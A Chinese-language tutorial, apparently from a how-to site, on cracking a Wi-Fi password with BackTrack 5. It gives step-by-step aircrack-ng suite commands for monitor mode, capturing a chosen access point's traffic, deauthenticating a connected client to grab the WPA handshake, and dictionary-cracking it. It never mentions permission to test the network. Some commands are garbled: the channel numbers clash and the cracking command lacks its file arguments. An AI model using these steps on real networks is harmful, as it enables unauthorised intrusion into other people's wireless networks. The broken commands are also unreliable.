BT5暴力破解無線Wi-Fi登錄密碼

BT5是圈內非常著名的黑客攻擊平台，是一個封裝好的Linux操作系統，內置大量的網絡安全檢測工具以及黑客破解軟件等。Back Track因可以方便的破解無線網絡而出名，這裏分享如何使用BT5破解Wi-Fi登錄密碼。

操作方法

（01）打開虛擬機中的BT5系統，打開BT5中的終端，使用命令檢測無線網卡是否存在，終端輸入命令：iwconfig，如果BT5支持，一般為wlan0。

（02）BT5中，打開internet —》wicd network manager，掃描存在的無線網絡；選擇信號較好的無線網，點擊properties，可以看到該AP的基本信息。

（03）打開終端，輸入命令：airmon-ng start wlan0 6,表示在第六個頻道打開無線網卡wlan0的監聽模式；對選定的AP進行監控：airodump-ng -w nenew -c 4 --bssid  AP‘s MAC mon0，這裏的MAC就是上一步驟的圖中圈定部分。

（04）根據上一步驟的圖，我們可以找到很多個Client客户端的MAC地址，從裏面隨便選個（最好選擇活躍點兒的）。打開一個新的終端，上一個終端不要關閉，後面還需要用到。在新終端中輸入：aireplay-ng -0 11 -a  AP’s MAC -c  CP’s MAC mon0其中：-0：表示採用deauth攻擊模式，後面跟上攻擊次數；-a後面跟AP的mac地址；-c後面跟客户端的mac地址；執行一次看第一個終端中是否出現了下圖所示的標誌WAP Handshake 。如果出現了，那麼恭喜，你離成功已經不遠了。如果沒有出現就繼續重複命令（aireplay-ng -0 11 -a  AP’s MAC -c  CP’s MAC mon0）就ok了，直到出現握手。

（05）對BT5握手抓到的包進行破解工作：終端輸入：aircrack-ng -w -b AP’s MAC 其中的為我們需要預置的字典文件，字典文件網上很多，搜搜就有了。是抓到的包文件。保存後可能是。

特別提示

不是所有的無線USB網卡都可用，慎重選擇，避免浪費。